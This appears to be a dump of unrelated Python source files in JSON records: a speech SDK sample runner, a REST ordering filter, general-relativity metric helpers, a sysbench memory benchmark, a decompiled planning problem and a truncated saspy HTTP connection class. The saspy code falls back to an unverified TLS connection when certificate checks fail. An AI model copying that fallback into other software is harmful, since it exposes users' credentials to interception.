See LICENSE.md file in the project root for full license information.\n\nimport droid_speech\n#import intent_sample\n#import translation_sample\n#import speech_synthesis_sample\n\nfrom collections import OrderedDict\nimport platform\n\n#eofkey = 'Ctrl-Z' if \"Windows\" == platform.system() else 'Ctrl-D'\n\ndroidspeechfunctions = OrderedDict([\n (droid_speech, [\n droid_speech.speech_recognize_once_from_mic,\n droid_speech.speech_recognize_once_from_file,\n droid_speech.speech_recognize_once_compressed_input,\n droid_speech.speech_recognize_once_from_file_with_customized_model,\n droid_speech.speech_recognize_once_from_file_with_custom_endpoint_parameters,\n droid_speech.speech_recognize_async_from_file,\n droid_speech.speech_recognize_continuous_from_file,\n droid_speech.speech_recognition_with_pull_stream,\n droid_speech.speech_recognition_with_push_stream,\n droid_speech.speech_recognize_keyword_from_microphone,\n droid_speech.speech_recognize_keyword_locally_from_microphone,\n droid_speech.pronunciation_assessment_from_microphone,\n ])\n])\n\n\ndef select():\n modules = list(droidspeechfunctions.keys())\n\n try:\n selected_module = modules[0]\n except EOFError:\n raise\n except Exception as e:\n print(e)\n return\n\n try:\n selected_function = droidspeechfunctions[selected_module][10]\n except EOFError:\n raise\n except Exception as e:\n print(e)\n return\n\n try:\n selected_function()\n except Exception as e:\n print('Error running droid funtion: {}'.format(e))\n\n print()\n\n\nwhile True:\n try:\n select()\n except EOFError:\n break\n"} {"ext": "py", "sha": "1a30b969cc1750ade029234dd85ad406f3134d9a", "content": "import itertools\nfrom collections import OrderedDict\n\nfrom rest_framework import filters, exceptions\n\nfrom .mixin import ViewSetMixin\n\n\ndef get_sort_order(request, param):\n args = request.query_params.getlist(param)\n fields = itertools.chain(*(arg.split(',') for arg in args))\n order = tuple(field.strip() for field in fields if field)\n return order\n\n\nclass OrderingFilter(filters.OrderingFilter):\n\n @staticmethod\n def get_translated_sort_order(fields, field_map):\n return tuple(field_map.get(field, field) for field in fields)\n\n @staticmethod\n def get_reverse_translated_sort_order(fields, field_map):\n sort_field_reverse_map = {value: key for (key, value) in field_map.items()}\n return tuple(sort_field_reverse_map.get(field, field) for field in fields)\n\n @staticmethod\n def get_consistent_sort_order(fields):\n return fields + type(fields)(('pk',))\n\n def get_ordering(self, request, queryset, view):\n fields = get_sort_order(request, self.ordering_param)\n\n if fields:\n field_map = getattr(view, 'sort_field_map', {})\n\n fields = self.get_translated_sort_order(fields, field_map)\n ordering = self.remove_invalid_fields(queryset, fields, view, request)\n\n if len(ordering) != len(fields):\n ext_fields = self.get_reverse_translated_sort_order(fields, field_map)\n ext_ordering = self.get_reverse_translated_sort_order(ordering, field_map)\n\n errors = {}\n\n for ext_field in ext_fields:\n if ext_field not in ext_ordering:\n errors[ext_field] = 'invalid field'\n\n raise exceptions.ValidationError(errors)\n\n ordering = self.get_consistent_sort_order(ordering)\n\n else:\n ordering = self.get_default_ordering(view)\n\n consistent_sort = getattr(view, 'consistent_sort', True)\n if consistent_sort:\n ordering = self.get_consistent_sort_order(ordering)\n\n return ordering\n\n\nclass SortedModelMixin(ViewSetMixin):\n ordering = ()\n\n sort_field_map = {}\n 
consistent_sort = True\n\n def list(self, request, *args, **kwargs):\n sort = get_sort_order(request, OrderingFilter.ordering_param) or self.ordering\n\n context = OrderedDict(sort=','.join(sort))\n\n return self.decorated_list(SortedModelMixin, context, request, *args, **kwargs)\n"} {"ext": "py", "sha": "1a30b9a21b52c8bbc88eb6948115ea78e0b0b199", "content": "# Distributed under the MIT License.\n# See LICENSE.txt for details.\n\nimport numpy as np\nfrom numpy import sqrt, exp\nfrom scipy.optimize import newton\n\n# Isotropic Schwarzschild coordinates\n\n\ndef conformal_metric_isotropic(x, mass):\n return np.identity(3)\n\n\ndef inv_conformal_metric_isotropic(x, mass):\n return np.identity(3)\n\n\ndef deriv_conformal_metric_isotropic(x, mass):\n return np.zeros((3, 3, 3))\n\n\ndef extrinsic_curvature_trace_isotropic(x, mass):\n return 0.\n\n\ndef extrinsic_curvature_trace_gradient_isotropic(x, mass):\n return np.zeros(3)\n\n\ndef conformal_factor_isotropic(x, mass):\n r = np.linalg.norm(x)\n return 1. + 0.5 * mass / r\n\n\ndef conformal_factor_gradient_isotropic(x, mass):\n r = np.linalg.norm(x)\n return -0.5 * mass * x / r**3\n\n\ndef lapse_times_conformal_factor_isotropic(x, mass):\n r = np.linalg.norm(x)\n return 1. - 0.5 * mass / r\n\n\ndef lapse_times_conformal_factor_gradient_isotropic(x, mass):\n r = np.linalg.norm(x)\n return 0.5 * mass * x / r**3\n\n\ndef lapse_isotropic(x, mass):\n return (lapse_times_conformal_factor_isotropic(x, mass) /\n conformal_factor_isotropic(x, mass))\n\n\ndef shift_background(x, mass):\n return np.zeros(3)\n\n\ndef longitudinal_shift_background_minus_dt_conformal_metric(x, mass):\n return np.zeros((3, 3))\n\n\ndef shift_isotropic(x, mass):\n return np.zeros(3)\n\n\ndef shift_strain_isotropic(x, mass):\n return np.zeros((3, 3))\n\n\ndef longitudinal_shift_isotropic(x, mass):\n return np.zeros((3, 3))\n\n\ndef shift_dot_extrinsic_curvature_trace_gradient_isotropic(x, mass):\n return 0.\n\n\ndef longitudinal_shift_minus_dt_conformal_metric_square_isotropic(x, mass):\n return 0.\n\n\ndef longitudinal_shift_minus_dt_conformal_metric_over_lapse_square_isotropic(\n x, mass):\n return 0.\n\n\n# Matter sources\n\n\ndef energy_density(x, mass):\n return 0.\n\n\ndef stress_trace(x, mass):\n return 0.\n\n\ndef momentum_density(x, mass):\n return np.zeros(3)\n\n\n# Fixed sources\n\n\ndef conformal_factor_fixed_source(x, mass):\n return 0.\n\n\ndef lapse_times_conformal_factor_fixed_source(x, mass):\n return 0.\n\n\ndef shift_fixed_source(x, mass):\n return np.zeros(3)\n"} {"ext": "py", "sha": "1a30ba368b79e15be22447dcdc619bec936cddc4", "content": "# -*- coding: utf-8 -*-\n#\n# Copyright 2015 Red Hat, Inc.\n# All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\"); you may\n# not use this file except in compliance with the License. You may obtain\n# a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS, WITHOUT\n# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. 
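# Independent sanity-check sketch (not part of either module above) for the
# isotropic Schwarzschild helpers: conformal_factor_isotropic is 1 + M/(2 r)
# and its stated gradient is -M x / (2 r^3).  A central finite difference
# confirms the two are consistent.
import numpy as np

def psi(x, mass):
    return 1.0 + 0.5 * mass / np.linalg.norm(x)

def dpsi(x, mass):
    r = np.linalg.norm(x)
    return -0.5 * mass * x / r**3

x = np.array([1.2, -0.7, 2.5])
mass = 0.8
h = 1e-6
fd = np.array([(psi(x + h * e, mass) - psi(x - h * e, mass)) / (2 * h)
               for e in np.eye(3)])
assert np.allclose(fd, dpsi(x, mass), atol=1e-6)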
See the\n# License for the specific language governing permissions and limitations\n# under the License.\n\"\"\"\nBenchmark Memory functions.\n\"\"\"\n\nimport re\nimport subprocess\nimport sys\n\nimport six\n\nfrom hardware.benchmark import utils\n\n\ndef get_available_memory():\n \"\"\"Return the total amount of available memory, in bytes.\"\"\"\n with open('/proc/meminfo', 'r') as meminfo:\n for line in meminfo:\n if line.startswith('MemFree:'):\n return int(line.split()[1]) * 1024\n return -1\n\n\ndef check_mem_size(block_size, cpu_count):\n \"\"\"Check if a test can run with a given block size and cpu count.\"\"\"\n dsplit = re.compile(r'\\d+')\n ssplit = re.compile(r'[A-Z]+')\n unit = ssplit.findall(block_size)\n unit_in_bytes = 1\n if unit[0] == 'K':\n unit_in_bytes = 1024\n elif unit[0] == 'M':\n unit_in_bytes = 1024 * 1024\n elif unit[0] == 'G':\n unit_in_bytes = 1024 * 1024 * 1024\n\n size_in_bytes = (unit_in_bytes * int(dsplit.findall(block_size)[0])\n * cpu_count)\n if size_in_bytes > get_available_memory():\n return False\n\n return True\n\n\ndef run_sysbench_memory_threaded(hw_lst, max_time, block_size, cpu_count,\n processor_num=None):\n \"\"\"Running memtest on a processor.\"\"\"\n check_mem = check_mem_size(block_size, cpu_count)\n taskset = ''\n if processor_num is not None:\n if check_mem is False:\n msg = (\"Avoid Benchmarking memory @%s \"\n \"from CPU %d, not enough memory\\n\")\n sys.stderr.write(msg % (block_size, processor_num))\n return\n\n sys.stderr.write('Benchmarking memory @%s from CPU %d'\n ' for %d seconds (%d threads)\\n' %\n (block_size, processor_num, max_time, cpu_count))\n taskset = 'taskset %s' % hex(1 << processor_num)\n else:\n if check_mem is False:\n msg = (\"Avoid Benchmarking memory @%s \"\n \"from all CPUs, not enough memory\\n\")\n sys.stderr.write(msg % block_size)\n return\n sys.stderr.write('Benchmarking memory @%s from all CPUs '\n 'for %d seconds (%d threads)\\n'\n % (block_size, max_time, cpu_count))\n\n _cmd = ('%s sysbench --max-time=%d --max-requests=100000000 '\n '--num-threads=%d --test=memory --memory-block-size=%s run')\n sysbench_cmd = subprocess.Popen(_cmd % (taskset, max_time,\n cpu_count, block_size),\n shell=True, stdout=subprocess.PIPE)\n\n for line in sysbench_cmd.stdout:\n if isinstance(line, six.binary_type):\n line = line.decode()\n if \"transferred\" in line:\n _, right = line.rstrip('\\n').replace(' ', '').split('(')\n perf, _ = right.split('.')\n if processor_num is not None:\n hw_lst.append(('cpu',\n 'logical_%d' % processor_num,\n 'bandwidth_%s' % block_size,\n perf))\n else:\n hw_lst.append(('cpu', 'logical',\n 'threaded_bandwidth_%s' % block_size,\n perf))\n\n\ndef run_sysbench_memory_forked(hw_lst, max_time, block_size, cpu_count):\n \"\"\"Running forked memtest on a processor.\"\"\"\n if check_mem_size(block_size, cpu_count) is False:\n cmd = ('Avoid benchmarking memory @%s from all'\n ' CPUs (%d forked processes), not enough memory\\n')\n sys.stderr.write(cmd % (block_size, cpu_count))\n return\n sys.stderr.write('Benchmarking memory @%s from all CPUs'\n ' for %d seconds (%d forked processes)\\n'\n % (block_size, max_time, cpu_count))\n sysbench_cmd = '('\n for _ in range(cpu_count):\n _cmd = ('sysbench --max-time=%d --max-requests=100000000 '\n '--num-threads=1 --test=memory --memory-block-size=%s run &')\n sysbench_cmd += _cmd % (max_time, block_size)\n\n sysbench_cmd.rstrip('&')\n sysbench_cmd += ')'\n\n global_perf = 0\n process = subprocess.Popen(\n sysbench_cmd, shell=True, stdout=subprocess.PIPE)\n for 
line in process.stdout:\n if isinstance(line, six.binary_type):\n line = line.decode()\n if \"transferred\" in line:\n _, right = line.rstrip('\\n').replace(' ', '').split('(')\n perf, _ = right.split('.')\n global_perf += int(perf)\n\n hw_lst.append(('cpu', 'logical', 'forked_bandwidth_%s' %\n (block_size), str(global_perf)))\n\n\ndef mem_perf(hw_lst, max_time=5):\n \"\"\"Report the memory performance.\"\"\"\n all_cpu_testing_time = 5\n block_size_list = ['1K', '4K', '1M', '16M', '128M', '1G', '2G']\n logical = utils.get_value(hw_lst, 'cpu', 'logical', 'number')\n physical = utils.get_value(hw_lst, 'cpu', 'physical', 'number')\n if physical:\n eta = int(physical) * len(block_size_list) * max_time\n eta += 2 * (all_cpu_testing_time * len(block_size_list))\n sys.stderr.write('Memory Performance: %d logical CPU'\n ' to test (ETA: %d seconds)\\n'\n % (int(physical), int(eta)))\n for cpu_nb in utils.get_one_cpu_per_socket(hw_lst):\n for block_size in block_size_list:\n run_sysbench_memory_threaded(hw_lst, max_time,\n block_size, 1, cpu_nb)\n\n # There is not need to test fork vs thread\n # if only a single logical cpu is present\n if int(logical) > 1:\n for block_size in block_size_list:\n run_sysbench_memory_threaded(hw_lst, all_cpu_testing_time,\n block_size, int(logical))\n\n for block_size in block_size_list:\n run_sysbench_memory_forked(hw_lst, all_cpu_testing_time,\n block_size, int(logical))\n"} {"ext": "py", "sha": "1a30ba4af27a0e287d5e46d9899c89b52cd03209", "content": "# -*- coding: utf-8 -*-\n\n\"\"\"\n********************************\nreslib.processing.loops\n********************************\n\nThis module provides convenience functions for looping over data, typically a DataFrame (or reslib.data.Table), and automating things like progress reporting (via tqdm or status files) or parallelization.\n\n:copyright: (c) 2019 by Maclean Gaulin.\n:license: MIT, see LICENSE for more details.\n\"\"\""} {"ext": "py", "sha": "1a30bb811b7dbb946a3fc858ca1704ee8fe83a55", "content": "# uncompyle6 version 3.3.1\n# Python bytecode 3.6 (3379)\n# Decompiled from: Python 3.6.2 (v3.6.2:5fd33b5926, Jul 16 2017, 20:11:06) \n# [GCC 4.2.1 (Apple Inc. 
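# Sketch of the bandwidth parsing used by run_sysbench_memory_threaded/_forked
# above: strip spaces, split on '(' and keep the integer part before the '.'.
# The sample line is only an assumed example of sysbench output; the exact
# wording can vary between sysbench versions.
def parse_bandwidth(line):
    # "102400.00 MB transferred (20480.00 MB/sec)" -> "20480"
    _, right = line.rstrip('\n').replace(' ', '').split('(')
    perf, _ = right.split('.')
    return perf

assert parse_bandwidth("102400.00 MB transferred (20480.00 MB/sec)\n") == "20480"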
build 5666) (dot 3)]\n# Embedded file name: ../../shared/problems/CR/problem1068_CR.py\n# Compiled at: 2019-03-13 18:01:49\n# Size of source mod 2**32: 1148 bytes\n__author__ = 'patras'\nfrom domain_chargeableRobot import *\nfrom timer import DURATION\nfrom state import state\nDURATION.TIME = {'put':2, \n 'take':2, \n 'perceive':2, \n 'charge':2, \n 'move':2, \n 'moveToEmergency':2, \n 'moveCharger':2, \n 'addressEmergency':2, \n 'wait':2}\nDURATION.COUNTER = {'put':2, \n 'take':2, \n 'perceive':2, \n 'charge':2, \n 'move':2, \n 'moveToEmergency':2, \n 'moveCharger':2, \n 'addressEmergency':2, \n 'wait':2}\nrv.LOCATIONS = [\n 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\nrv.EDGES = {1:[2], 2:[1, 3], 3:[2, 4], 4:[5, 3, 6, 7], 5:[4, 9], 6:[4, 10], 7:[4, 8], 8:[7], 9:[5], 10:[6]}\nrv.OBJECTS = ['o1']\nrv.ROBOTS = [\n 'r1', 'r2']\n\ndef ResetState():\n state.loc = {'r1':1, \n 'r2':1}\n state.charge = {'r1':2, 'r2':3}\n state.load = {'r1':NIL, 'r2':NIL}\n state.pos = {'c1':'r2', 'o1':5}\n state.containers = {1:[], 2:[], 3:[], 4:[], 5:['o1'], 6:[], 7:[], 8:[], 9:[], 10:[]}\n state.emergencyHandling = {'r1':False, 'r2':False}\n state.view = {}\n for l in rv.LOCATIONS:\n state.view[l] = False\n\n\ntasks = {5: [['fetch', 'r1', 'o1']]}\neventsEnv = {}\n# okay decompiling __pycache__/problem1068_CR.cpython-36.pyc\n"} {"ext": "py", "sha": "1a30bbea337233d6a726817bfaa16aa586c048b3", "content": "#\n# Copyright SAS Institute\n#\n# Licensed under the Apache License, Version 2.0 (the License);\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\nimport http.client as hc\nimport base64\nimport json\nimport os\nimport ssl\nimport sys\nimport urllib\nimport warnings\nimport io\n\nimport tempfile as tf\nfrom time import sleep\n\nfrom saspy.sasexceptions import (SASHTTPauthenticateError, SASHTTPconnectionError, SASHTTPsubmissionError)\n\nimport logging\nlogger = logging.getLogger('saspy')\n\ntry:\n import pandas as pd\n import numpy as np\nexcept ImportError:\n pass\n\nclass SASconfigHTTP:\n '''\n This object is not intended to be used directly. 
Instantiate a SASsession object instead\n '''\n def __init__(self, session, **kwargs):\n self._kernel = kwargs.get('kernel', None)\n SAScfg = session._sb.sascfg.SAScfg\n self.name = session._sb.sascfg.name\n cfg = getattr(SAScfg, self.name)\n\n self._token = cfg.get('authtoken', None)\n self.url = cfg.get('url', '')\n self.ip = cfg.get('ip', '')\n self.port = cfg.get('port', None)\n self.ctxname = cfg.get('context', '')\n self.ctx = {}\n self.options = cfg.get('options', [])\n self.ssl = cfg.get('ssl', True)\n self.verify = cfg.get('verify', True)\n self.timeout = cfg.get('timeout', None)\n user = cfg.get('user', '')\n pw = cfg.get('pw', '')\n client_id = cfg.get('client_id', None)\n client_secret = cfg.get('client_secret', '')\n authcode = cfg.get('authcode', None)\n jwt = cfg.get('jwt', None)\n self.encoding = cfg.get('encoding', '')\n self.authkey = cfg.get('authkey', '')\n self._prompt = session._sb.sascfg._prompt\n self.lrecl = cfg.get('lrecl', None)\n self.inactive = cfg.get('inactive', 120)\n\n try:\n self.outopts = getattr(SAScfg, \"SAS_output_options\")\n self.output = self.outopts.get('output', 'html5')\n except:\n self.output = 'html5'\n\n if self.output.lower() not in ['html', 'html5']:\n logger.warning(\"Invalid value specified for SAS_output_options. Using the default of HTML5\")\n self.output = 'html5'\n\n # GET Config options\n try:\n self.cfgopts = getattr(SAScfg, \"SAS_config_options\")\n except:\n self.cfgopts = {}\n\n lock = self.cfgopts.get('lock_down', True)\n # in lock down mode, don't allow runtime overrides of option values from the config file.\n\n self.verbose = self.cfgopts.get('verbose', True)\n self.verbose = kwargs.get('verbose', self.verbose)\n\n inurl = kwargs.get('url', None)\n if inurl is not None:\n if lock and len(self.url):\n logger.warning(\"Parameter 'url' passed to SAS_session was ignored due to configuration restriction.\")\n else:\n self.url = inurl\n\n inip = kwargs.get('ip', None)\n if inip is not None:\n if lock and len(self.ip):\n logger.warning(\"Parameter 'ip' passed to SAS_session was ignored due to configuration restriction.\")\n else:\n self.ip = inip\n\n inport = kwargs.get('port', None)\n if inport is not None:\n if lock and self.port:\n logger.warning(\"Parameter 'port' passed to SAS_session was ignored due to configuration restriction.\")\n else:\n self.port = inport\n\n inctxname = kwargs.get('context', None)\n if inctxname is not None:\n if lock and len(self.ctxname):\n logger.warning(\"Parameter 'context' passed to SAS_session was ignored due to configuration restriction.\")\n else:\n self.ctxname = inctxname\n\n inoptions = kwargs.get('options', None)\n if inoptions is not None:\n if lock and len(self.options):\n logger.warning(\"Parameter 'options' passed to SAS_session was ignored due to configuration restriction.\")\n else:\n self.options = inoptions\n\n inssl = kwargs.get('ssl', None)\n if inssl is not None:\n if lock and self.ssl:\n logger.warning(\"Parameter 'ssl' passed to SAS_session was ignored due to configuration restriction.\")\n else:\n self.ssl = bool(inssl)\n\n inver = kwargs.get('verify', None)\n if inver is not None:\n if lock and self.verify:\n logger.warning(\"Parameter 'verify' passed to SAS_session was ignored due to configuration restriction.\")\n else:\n self.verify = bool(inver)\n\n intout = kwargs.get('timeout', None)\n if intout is not None:\n if lock and self.timeout:\n logger.warning(\"Parameter 'timeout' passed to SAS_session was ignored due to configuration restriction.\")\n else:\n self.timeout = 
intout\n\n inencoding = kwargs.get('encoding', 'NoOverride')\n if inencoding != 'NoOverride':\n if lock and len(self.encoding):\n logger.warning(\"Parameter 'encoding' passed to SAS_session was ignored due to configuration restriction.\")\n else:\n self.encoding = inencoding\n if not self.encoding or self.encoding != 'utf_8':\n self.encoding = 'utf_8'\n\n inautht = kwargs.get('authtoken', None)\n if inautht is not None:\n self._token = inautht\n\n injwt = kwargs.get('jwt', None)\n if injwt is not None:\n jwt = injwt\n\n inauthc = kwargs.get('authcode', None)\n if inauthc is not None:\n authcode = inauthc\n\n incis = kwargs.get('client_secret', None)\n if incis is not None:\n if lock and client_secret:\n logger.warning(\"Parameter 'client_secret' passed to SAS_session was ignored due to configuration restriction.\")\n else:\n client_secret = incis\n\n incid = kwargs.get('client_id', None)\n if incid is not None:\n if lock and client_id:\n logger.warning(\"Parameter 'client_id' passed to SAS_session was ignored due to configuration restriction.\")\n else:\n client_id = incid\n if client_id is None:\n client_id = 'SASPy'\n use_authcode = False\n else:\n use_authcode = True\n\n inlrecl = kwargs.get('lrecl', None)\n if inlrecl is not None:\n if lock and self.lrecl:\n logger.warning(\"Parameter 'lrecl' passed to SAS_session was ignored due to configuration restriction.\")\n else:\n self.lrecl = inlrecl\n if not self.lrecl:\n self.lrecl = 1048576\n\n inito = kwargs.get('inactive', None)\n if inito is not None:\n if lock and self.inactive:\n logger.warning(\"Parameter 'inactive' passed to SAS_session was ignored due to configuration restriction.\")\n else:\n self.inactive = inito\n\n inak = kwargs.get('authkey', '')\n if len(inak) > 0:\n if lock and len(self.authkey):\n logger.warning(\"Parameter 'authkey' passed to SAS_session was ignored due to configuration restriction.\")\n else:\n self.authkey = inak\n\n if len(self.url) > 0:\n http = self.url.split('://')\n hp = http[1].split(':')\n if http[0].lower() in ['http', 'https']:\n self.ip = hp[0]\n self.port = hp[1] if len(hp) > 1 else self.port\n self.ssl = True if 's' in http[0].lower() else False\n else:\n logger.warning(\"Parameter 'url' not in recognized format. Expeting 'http[s]://host[:port]'. 
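# Sketch of the url handling above, which derives host, port and ssl from an
# 'http[s]://host[:port]' string.  urllib.parse.urlsplit is shown here as an
# equivalent, slightly more forgiving way to do the same split; the example
# host names are placeholders.
from urllib.parse import urlsplit

def split_compute_url(url):
    parts = urlsplit(url)
    if parts.scheme not in ('http', 'https'):
        raise ValueError("expected 'http[s]://host[:port]', got: " + url)
    ssl_on = parts.scheme == 'https'
    port = parts.port or (443 if ssl_on else 80)
    return parts.hostname, port, ssl_on

assert split_compute_url('https://viya.example.com') == ('viya.example.com', 443, True)
assert split_compute_url('http://viya.example.com:8080') == ('viya.example.com', 8080, False)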
Ignoring parameter.\")\n\n while len(self.ip) == 0:\n if not lock:\n self.ip = self._prompt(\"Please enter the host (ip address) you are trying to connect to: \")\n if self.ip is None:\n self._token = None\n raise RuntimeError(\"No IP address provided.\")\n else:\n logger.fatal(\"In lockdown mode and missing ip adress in the config named: \"+cfgname )\n raise RuntimeError(\"No IP address provided.\")\n\n if not self.port:\n if self.ssl:\n self.port = 443\n else:\n self.port = 80\n\n if not self._token and not authcode and not jwt:\n found = False\n if self.authkey:\n if os.name == 'nt':\n pwf = os.path.expanduser('~')+os.sep+'_authinfo'\n else:\n pwf = os.path.expanduser('~')+os.sep+'.authinfo'\n try:\n fid = open(pwf, mode='r')\n for line in fid:\n if line.startswith(self.authkey):\n user = line.partition('user')[2].lstrip().partition(' ')[0].partition('\\n')[0]\n pw = line.partition('password')[2].lstrip().partition(' ')[0].partition('\\n')[0]\n found = True\n break\n fid.close()\n except OSError as e:\n logger.warning('Error trying to read authinfo file:'+pwf+'\\n'+str(e))\n pass\n except:\n pass\n\n if not found:\n logger.warning('Did not find key '+self.authkey+' in authinfo file:'+pwf+'\\n')\n\n inuser = kwargs.get('user', '')\n if len(inuser) > 0:\n if lock and len(user):\n logger.warning(\"Parameter 'user' passed to SAS_session was ignored due to configuration restriction.\")\n else:\n user = inuser\n\n inpw = kwargs.get('pw', '')\n if len(inpw) > 0:\n if lock and len(pw):\n logger.warning(\"Parameter 'pw' passed to SAS_session was ignored due to configuration restriction.\")\n else:\n pw = inpw\n\n if use_authcode:\n code_pw = 'authcode'\n else:\n code_pw = ''\n if len(user) == 0:\n msg = \"To connect to Viya you need either an authcode or a userid/pw. Neither were provided.\\n\"\n msg += \"Please enter which one you want to enter next. Type one of these now: [default=authcode | userid]: \"\n while code_pw.lower() not in ['userid','authcode']:\n code_pw = self._prompt(msg)\n if code_pw == '':\n code_pw = 'authcode'\n if code_pw is None:\n self._token = None\n raise RuntimeError(\"Neither authcode nor userid provided.\")\n\n if code_pw.lower() == 'authcode':\n purl = \"/SASLogon/oauth/authorize?client_id={}&response_type=code\".format(client_id)\n if len(self.url) > 0:\n purl = self.url+purl\n else:\n purl = \"http{}://{}:{}{}\".format('s' if self.ssl else '', self.ip, self.port, purl)\n msg = \"The default url to authenticate with would be {}\\n\".format(purl)\n msg += \"Please enter authcode: \"\n authcode = self._prompt(msg)\n if authcode is None:\n self._token = None\n raise RuntimeError(\"No authcode provided.\")\n else:\n while len(user) == 0:\n user = self._prompt(\"Please enter userid: \")\n if user is None:\n self._token = None\n raise RuntimeError(\"No userid provided.\")\n\n while len(pw) == 0:\n pw = self._prompt(\"Please enter password: \", pw = True)\n if pw is None:\n self._token = None\n raise RuntimeError(\"No password provided.\")\n\n if self.ssl:\n if self.verify:\n # handle having self signed certificate default on Viya w/out copies on client; still ssl, just not verifyable\n try:\n self.HTTPConn = hc.HTTPSConnection(self.ip, self.port, timeout=self.timeout)\n if not self._token:\n self._token = self._authenticate(user, pw, authcode, client_id, client_secret, jwt)\n except ssl.SSLError as e:\n logger.warning(\"SSL certificate verification failed, creating an unverified SSL connection. 
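# Compact sketch of the authinfo lookup used above: scan ~/.authinfo
# (_authinfo on Windows) for a line starting with the configured key and pull
# out the tokens following 'user' and 'password'.  The default path mirrors
# the logic in the code; pass an explicit path to override it.
import os

def read_authinfo(authkey, path=None):
    if path is None:
        name = '_authinfo' if os.name == 'nt' else '.authinfo'
        path = os.path.join(os.path.expanduser('~'), name)
    with open(path) as fid:
        for line in fid:
            if line.startswith(authkey):
                user = line.partition('user')[2].lstrip().partition(' ')[0].rstrip('\n')
                pw = line.partition('password')[2].lstrip().partition(' ')[0].rstrip('\n')
                return user, pw
    return None, None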
Error was:\"+str(e))\n self.HTTPConn = hc.HTTPSConnection(self.ip, self.port, timeout=self.timeout, context=ssl._create_unverified_context())\n logger.warning(\"You can set 'verify=False' to get rid of this message \")\n if not self._token:\n self._token = self._authenticate(user, pw, authcode, client_id, client_secret, jwt)\n else:\n self.HTTPConn = hc.HTTPSConnection(self.ip, self.port, timeout=self.timeout, context=ssl._create_unverified_context())\n if not self._token:\n self._token = self._authenticate(user, pw, authcode, client_id, client_secret, jwt)\n else:\n self.HTTPConn = hc.HTTPConnection(self.ip, self.port, timeout=self.timeout)\n if not self._token:\n self._token = self._authenticate(user, pw, authcode, client_id, client_secret, jwt)\n\n if not self._token:\n logger.error(\"Could not acquire an Authentication Token\")\n return\n\n # GET Contexts\n contexts = self._get_contexts()\n if contexts == None:\n self._token = None\n raise SASHTTPconnectionError(msg=\"No Contexts found on Compute Service at ip=\"+self.ip)\n\n ctxnames = []\n for i in range(len(contexts)):\n ctxnames.append(contexts[i].get('name'))\n\n if len(ctxnames) == 0:\n self._token = None\n raise SASHTTPconnectionError(msg=\"No Contexts found on Compute Service at ip=\"+self.ip)\n\n if len(self.ctxname) == 0:\n if len(ctxnames) == 1:\n self.ctxname = ctxnames[0]\n logger.info(\"Using SAS Context: \" + self.ctxname)\n else:\n try:\n ctxname = self._prompt(\"Please enter the SAS Context you wish to run. Available contexts are: \" +\n str(ctxnames)+\" \")\n if ctxname is None:\n self._token = None\n raise RuntimeError(\"No SAS Context provided.\")\n else:\n self.ctxname = ctxname\n except:\n raise SASHTTPconnectionError(msg=\n \"SAS Context specified '\"+self.ctxname+\"' was not found. Prompting failed. Available contexts were: \" +\n str(ctxnames)+\" \")\n\n while self.ctxname not in ctxnames:\n if not lock:\n ''' this was original code before compute was production. users can't create these on the fly.\n createctx = self._prompt(\n \"SAS Context specified was not found. Do you want to create a new context named \"+self.ctxname+\" [Yes|No]?\")\n if createctx.upper() in ('YES', 'Y'):\n contexts = self._create_context(user)\n else:\n '''\n try:\n ctxname = self._prompt(\n \"SAS Context specified was not found. Please enter the SAS Context you wish to run. Available contexts are: \" +\n str(ctxnames)+\" \")\n if ctxname is None:\n self._token = None\n raise SASHTTPconnectionError(msg=\n \"SAS Context specified '\"+self.ctxname+\"' was not found. Prompting failed. Available contexts were: \" +\n str(ctxnames)+\" \")\n else:\n self.ctxname = ctxname\n except:\n raise SASHTTPconnectionError(msg=\n \"SAS Context specified '\"+self.ctxname+\"' was not found. Prompting failed. Available contexts were: \" +\n str(ctxnames)+\" \")\n else:\n msg = \"SAS Context specified in the SASconfig (\"+self.ctxname+\") was not found on this server, and because \"\n msg += \"the SASconfig is in lockdown mode, there is no prompting for other contexts. 
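# Bare sketch of the "try verified TLS, fall back to unverified with a
# warning" pattern used above.  host and port are placeholders;
# ssl._create_unverified_context() is the same call the code falls back to.
import http.client as hc
import ssl
import warnings

def open_https(host, port, timeout=None):
    try:
        conn = hc.HTTPSConnection(host, port, timeout=timeout)
        conn.connect()   # raises ssl.SSLError if the certificate cannot be verified
        return conn
    except ssl.SSLError as err:
        warnings.warn('certificate verification failed (%s); '
                      'falling back to an unverified connection' % err)
        return hc.HTTPSConnection(host, port, timeout=timeout,
                                  context=ssl._create_unverified_context())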
No connection established.\"\n logger.error(msg)\n self._token = None\n raise RuntimeError(\"No SAS Context provided.\")\n\n for i in range(len(contexts)):\n if contexts[i].get('name') == self.ctxname:\n self.ctx = contexts[i]\n break\n\n if self.ctx == {}:\n raise SASHTTPconnectionError(msg=\"No context information returned for context {}\\n{}\".format(self.ctxname, contexts))\n\n return\n\n def _authenticate(self, user, pw, authcode, client_id, client_secret, jwt):\n #import pdb; pdb.set_trace()\n if authcode:\n uauthcode = urllib.parse.quote(authcode)\n uclient_id = urllib.parse.quote(client_id)\n uclient_secret = urllib.parse.quote(client_secret)\n d1 = (\"grant_type=authorization_code&code=\"+uauthcode+\n \"&client_id=\"+uclient_id+\"&client_secret=\"+uclient_secret).encode(self.encoding)\n headers = {\"Accept\":\"application/vnd.sas.compute.session+json\",\"Content-Type\":\"application/x-www-form-urlencoded\"}\n elif jwt:\n ujwt = urllib.parse.quote(jwt)\n d1 = \"grant_type=urn:ietf:params:oauth:grant-type:jwt-bearer&assertion=\"+ujwt\n client = \"Basic \"+base64.encodebytes((client_id+\":\").encode(self.encoding)).splitlines()[0].decode(self.encoding)\n headers = {\"Accept\":\"application/vnd.sas.compute.session+json\",\n \"Content-Type\":\"application/x-www-form-urlencoded\",\n \"Authorization\":client}\n else:\n uuser = urllib.parse.quote(user)\n upw = urllib.parse.quote(pw)\n d1 = 